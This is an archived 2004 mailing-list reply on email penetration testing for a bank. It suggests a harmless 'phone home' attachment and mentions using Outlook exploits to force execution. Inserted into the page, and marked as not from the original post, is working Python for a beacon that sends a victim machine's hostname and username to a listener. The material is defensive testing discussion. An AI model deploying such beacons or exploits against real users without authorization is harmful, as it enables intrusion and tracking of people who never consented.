Re: Email Pen-testing

From: hwertz@voltron.homelinux.org
Date: Sun Mar 21 2004 - 19:38:38 EST


> Doing a pen-test for a small bank which was proving very difficult to
> get it. A friend of mine suggested I send a backdoor trojan attachment
> via an email. If they clicked on it, the backdoor performs maybe a
> boxscan, grab passwords, and connects out to the Internet. --Much like
> a virus.
*cut*
> I spoke with a previous customer of mine about the idea. He said he
> would be very upset if he was not told prior to that type of test as
> part of normal pen-testing.
*cut*
> What's your ideas on the email pen-testing?

     I would certainly not send a worm that sends out passwords or do a
box scan or anything (without previous permission). I would consider
sending an attachment that "phones home" with IP and perhaps some
identifiable info (like the E-Mail addr of the person if they're running
Outlook, or NetBIOS machine name or something.) The extra info would be
so if they're behind NAT or on DHCP, it'll help narrow down the source of
trouble. I would not have the executable even install, just have it
execute once in RAM. I would feel free to use any Outlook exploits to
attempt to force execution though.

     Then if you do get some IPs etc. sent back, you can put in your
report that your attachment was harmless but people (or unpatched
software) automatically running attachments can cause a leak of passwords,
backdoors installed, etc. I don't think you need to actually *get*
passwords to show this 8-).
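The "phone home" attachment described above, as an added example that is not code from the original post or its author: a listener that records the connecting IP alongside whatever the beacon reports about itself, and a beacon that collects only benign identifying info (hostname and logged-in user), sends it once, and writes nothing to disk. The sample identity values, the listener address and the function names are constructed for the demo; a real engagement would point the beacon at a host the tester controls and agreed on in the rules of engagement.

```python
import getpass
import json
import socket
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# In-memory record the tester later turns into report findings.
REPORTS = []


class BeaconHandler(BaseHTTPRequestHandler):
    """Listener side: pair the peer IP seen on the socket (which NAT or DHCP
    may make ambiguous) with the identifying fields the beacon supplies."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", "0"))
        body = json.loads(self.rfile.read(length) or b"{}")
        REPORTS.append({
            "peer_ip": self.client_address[0],
            "hostname": body.get("hostname"),
            "user": body.get("user"),
        })
        self.send_response(204)  # nothing to send back; the beacon is one-shot
        self.end_headers()

    def log_message(self, *args):
        pass  # keep the default access log off stdout


def start_listener(host="127.0.0.1", port=0):
    """Bind the listener (port 0 = any free port) and serve in a thread."""
    srv = HTTPServer((host, port), BeaconHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def collect_identity():
    """Beacon side: host name (the NetBIOS name on Windows) and user name.
    No password or file access, no persistence, nothing written to disk."""
    return {"hostname": socket.gethostname(), "user": getpass.getuser()}


def beacon(url, identity=None):
    """Send one callback and return the HTTP status the listener answered."""
    data = json.dumps(identity or collect_identity()).encode()
    req = urllib.request.Request(
        url, data=data, headers={"Content-Type": "application/json"},
        method="POST",
    )
    with urllib.request.urlopen(req, timeout=5) as resp:
        return resp.status


def demo():
    """Run listener and beacon in one process; constructed sample identity."""
    srv = start_listener()
    url = "http://127.0.0.1:%d/" % srv.server_address[1]
    status = beacon(url, {"hostname": "WKSTN-TELLER3", "user": "jdoe"})
    srv.shutdown()
    return status, REPORTS[-1]


if __name__ == "__main__":
    print(demo())
```

The finding the report needs is the pairing in `REPORTS`: the peer IP shows that an attachment reached the outside world from inside the bank, and the hostname and user name show which desk it ran on even when several desks sit behind one NAT address.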




This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:53:51 EDT